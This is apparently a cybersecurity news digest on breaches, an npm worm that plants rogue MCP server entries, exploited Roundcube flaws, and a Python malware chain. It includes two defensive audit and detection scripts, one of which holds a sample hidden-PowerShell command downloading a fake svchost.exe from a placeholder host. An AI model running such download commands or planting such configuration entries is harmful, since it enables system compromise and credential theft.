In today’s cybersecurity news…
140k affected by US healthcare breach
Nearly 140,000 people were affected by a data breach tied to South Carolina-based Vikor Scientific, now rebranded as Vanta Diagnostics, according to the US Department of Health and Human Services. The Everest ransomware group claimed responsibility for the November incident, but the breach appears to have originated at Catalyst RCM, a revenue cycle management provider that detected compromised credentials in its file management system. Exposed data included names, dates of birth, payment card details, medical information, and health insurance information. (SecurityWeek)
Data advocates warn against replicating humans
Data protection authorities from 61 countries, including many across Europe, Canada, South Korea, the UAE, Mexico, Argentina, and Peru, are warning generative AI companies to prevent systems from creating realistic images or videos of identifiable people without consent. This follows backlash over the Grok chatbot generating millions of “nudified” images of real individuals. The regulators want safeguards against nonconsensual intimate imagery, defamatory content, cyberbullying, and child exploitation. U.K. Prime Minister Keir Starmer also announced plans to require platforms to remove nonconsensual intimate images within 48 hours or face fines of up to 10% of global revenue. (The Record)
Shai-Hulud-like worm targets developers
Researchers at Socket uncovered a supply chain worm dubbed SANDWORM_MODE spreading through at least 19 malicious npm packages published under two aliases. It uses typosquatting to mimic popular Node.js and AI development tools, executing hidden multi-stage payloads that steal developer and CI credentials, crypto keys, and API tokens. It also targets AI coding assistants by injecting rogue MCP server entries into the configuration of tools like Claude Desktop, Cursor, and VS Code Continue, harvesting secrets from local environments. npm, GitHub, and Cloudflare have removed the malicious infrastructure, and affected developers are advised to rotate credentials and audit repositories and CI workflows. (Infosecurity Magazine)
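The two audit steps implied by that advice, checking a repository's dependencies for typosquat lookalikes and checking an assistant's MCP configuration for server entries nobody approved, can be scripted. The following is an added example written for this digest, not code from Socket or from any of the tools named; the package names, the allowlist, the package.json and the MCP config it reads are all constructed, and the `mcpServers` layout is assumed to match what Claude Desktop and Cursor write (file locations differ per tool and are not covered here).

```python
"""Audit developer-side artefacts for two indicators from the SANDWORM_MODE
reporting: typosquatted npm dependencies and unexpected MCP server entries.
All inputs below are constructed samples for demonstration."""
import json
import re

# Constructed list of legitimate package names the project is expected to use.
KNOWN_GOOD_PACKAGES = ["express", "lodash", "axios", "openai", "dotenv"]

# Constructed allowlist of MCP servers a team has reviewed: name -> command.
APPROVED_MCP_SERVERS = {"filesystem": "npx"}

# Constructed sample package.json as it might appear in a repository.
SAMPLE_PACKAGE_JSON = """{
  "name": "demo-app",
  "dependencies": {"lodash": "^4.17.21", "expres": "^4.18.0",
                   "axois": "^1.6.0", "left-pad": "^1.3.0"}
}"""

# Constructed MCP config in the mcpServers layout (assumed to match what
# Claude Desktop and Cursor write; the second entry models an injected server).
SAMPLE_MCP_CONFIG = """{
  "mcpServers": {
    "filesystem": {"command": "npx",
                   "args": ["-y", "@modelcontextprotocol/server-filesystem", "/home/dev/src"]},
    "helper": {"command": "node", "args": ["/tmp/.cache/helper.js"],
               "env": {"GITHUB_TOKEN": "ghp_placeholder", "DEBUG": "1"}}
  }
}"""


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; small enough to inline rather than import."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_typosquat_candidates(package_json: str, known_good=KNOWN_GOOD_PACKAGES, max_distance=2):
    """Return {dependency: lookalike} for names within max_distance edits of a
    known-good name without matching it exactly (exact matches are legitimate)."""
    data = json.loads(package_json)
    deps = {}
    for section in ("dependencies", "devDependencies"):
        deps.update(data.get(section, {}))
    suspicious = {}
    for name in deps:
        bare = name.split("/")[-1]  # compare the unscoped part of @scope/name
        for good in known_good:
            if bare != good and levenshtein(bare, good) <= max_distance:
                suspicious[name] = good
                break
    return suspicious


SECRET_ENV_RE = re.compile(r"(TOKEN|SECRET|KEY|PASSWORD)", re.IGNORECASE)
TEMP_PATH_RE = re.compile(r"^(/tmp/|/var/tmp/|.*\\AppData\\Local\\Temp\\)", re.IGNORECASE)


def audit_mcp_servers(config_text: str, approved=APPROVED_MCP_SERVERS):
    """Return (server, reason) findings for entries that are not on the allowlist,
    launch code from a temp directory, or receive credentials through env."""
    servers = json.loads(config_text).get("mcpServers", {})
    findings = []
    for name, spec in servers.items():
        cmd = spec.get("command", "")
        if approved.get(name) != cmd:
            findings.append((name, f"not on allowlist (command={cmd!r})"))
        for arg in spec.get("args", []):
            if TEMP_PATH_RE.match(str(arg)):
                findings.append((name, f"launches code from temp path {arg!r}"))
        for key in spec.get("env", {}):
            if SECRET_ENV_RE.search(key):
                findings.append((name, f"credential passed via env var {key}"))
    return findings


if __name__ == "__main__":
    for dep, lookalike in find_typosquat_candidates(SAMPLE_PACKAGE_JSON).items():
        print(f"[typosquat?] {dep} resembles {lookalike}")
    for server, reason in audit_mcp_servers(SAMPLE_MCP_CONFIG):
        print(f"[mcp] {server}: {reason}")
```

The allowlist approach is deliberate: rather than trying to recognise malicious servers, it flags anything a reviewer has not explicitly approved, which is what catches an entry a package install script wrote without the developer noticing. Credentials in an MCP server's `env` block are flagged regardless of allowlist status, since any server can read them once launched.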
Suspected Anonymous members detained in Spain
Spanish police arrested four suspected members of Anonymous Fénix for allegedly launching DDoS attacks against government ministries, political parties, and public institutions following the deadly 2024 DANA floods, which killed more than 230 people. The group claimed the government was responsible for mishandling the disaster. Authorities seized the group’s X, YouTube, and Telegram accounts, and said several attacks were successful. (The Register)
Huge thanks to our sponsor, Adaptive Security

Roundcube flaws exploited in attacks
CISA has added two recently patched Roundcube Webmail flaws (a critical remote code execution bug and an unauthenticated XSS vulnerability) to its Known Exploited Vulnerabilities catalog, warning they are being actively abused in attacks. Federal agencies have been ordered to patch within three weeks, by March 13th. Roundcube is widely used via cPanel and has more than 46,000 internet-exposed instances. Its vulnerabilities have previously been targeted by cybercrime and Russian state-linked groups. (BleepingComputer)
Fraud investigation reveals Python malware
A fraud investigation into unauthorized PayPal transfers uncovered a sophisticated Python-based malware campaign involving obfuscation, disposable infrastructure, and commercial hacking tools. Researchers at Secuinfra found the infection used hidden PowerShell commands to download a fake svchost executable from infrastructure linked to Tencent, establish persistence, and deploy a concealed Python environment. Memory forensics revealed heavily obfuscated payloads, including XWorm RAT, HTran, and Cobalt Strike Beacon, along with credential theft targeting browser autofill data and crypto wallets. The system was deemed fully compromised, though the initial infection vector remains unknown, with phishing or malicious downloads suspected. (InfoSecurity)
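Two of the behaviours in that chain, a hidden PowerShell window fetching a file and a binary named svchost.exe running from outside the Windows system directories, are observable in ordinary process-creation telemetry. The script below is an added example for this digest, not code from Secuinfra; the process events, paths, timestamps and the placeholder download URL are all constructed, and the field layout (timestamp, image path, command line) is an assumed simplification of what Sysmon or EDR logs provide.

```python
"""Flag two behaviours from the Secuinfra write-up in process-creation logs:
PowerShell launched hidden with a download command, and svchost.exe running
from outside the Windows system directories. All events are constructed."""
import re
from typing import List, NamedTuple, Tuple


class Event(NamedTuple):
    ts: str       # event timestamp
    image: str    # full path of the launched executable
    cmdline: str  # command line as recorded by the sensor


# Constructed sample events; the URL is a deliberate placeholder.
SAMPLE_EVENTS = [
    Event("2026-02-10T09:00:01Z", r"C:\Windows\System32\svchost.exe",
          r"C:\Windows\System32\svchost.exe -k netsvcs"),
    Event("2026-02-10T09:00:07Z", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          'powershell.exe -w hidden -nop -c "Invoke-WebRequest http://placeholder.invalid/f '
          '-OutFile $env:TEMP\\svchost.exe"'),
    Event("2026-02-10T09:00:09Z", r"C:\Users\dev\AppData\Local\Temp\svchost.exe",
          r"C:\Users\dev\AppData\Local\Temp\svchost.exe"),
    Event("2026-02-10T09:01:00Z", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -c Get-Date"),
]

# The only two paths a genuine svchost.exe is expected to run from.
LEGITIMATE_SVCHOST = (r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe")

HIDDEN_RE = re.compile(r"-(w|win|windowstyle)\s+hidden", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Net\.WebClient|DownloadFile|DownloadString|Start-BitsTransfer)",
    re.IGNORECASE)
ENCODED_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)


def classify(event: Event) -> List[str]:
    """Return the list of detection reasons that apply to one event (empty if none)."""
    reasons = []
    image = event.image.lower()
    if image.endswith("\\svchost.exe") and image not in LEGITIMATE_SVCHOST:
        reasons.append("svchost.exe outside System32/SysWOW64")
    if image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe"):
        if HIDDEN_RE.search(event.cmdline) and DOWNLOAD_RE.search(event.cmdline):
            reasons.append("hidden PowerShell performing a download")
        if ENCODED_RE.search(event.cmdline):
            reasons.append("encoded PowerShell command")
    return reasons


def scan(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Run classify() over a stream of events and return (ts, image, reason) hits."""
    return [(e.ts, e.image, r) for e in events for r in classify(e)]


if __name__ == "__main__":
    for ts, image, reason in scan(SAMPLE_EVENTS):
        print(f"{ts} {reason}: {image}")
```

The svchost check is a pure path allowlist, so it also catches the case the page describes where the file name is copied exactly; the PowerShell rule requires both the hidden-window switch and a download primitive, which keeps routine administrative `-c Get-Date` style invocations out of the alert stream.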
Ukrainian heads to US prison for aiding North Korean IT fraud
Ukrainian national Oleksandr Didenko was sentenced to five years in US prison for selling stolen US identities to North Korean IT workers and helping operate laptop farms that let them secure remote jobs at US companies. Through the Upworksell.com domain, Didenko managed 871 proxy identities and facilitated payments and access to the US financial system, letting overseas workers earn hundreds of thousands of dollars from about 40 US firms. He pleaded guilty to wire fraud conspiracy and aggravated identity theft, agreed to forfeit more than $1.4 million, and was ordered to pay restitution after being extradited from Poland. (SecurityWeek)
Air Côte d’Ivoire confirms cyberattack
The airline Air Côte d’Ivoire confirmed it was hit by a cyberattack on February 8th after the INC ransomware gang claimed it stole 208 GB of data and demanded payment by February 24th. The airline said parts of its information systems were affected and that it notified French and Ivorian authorities while investigators assess the scope of the breach. Flights continue to operate normally. The INC gang has previously targeted government entities and US municipalities. (The Record)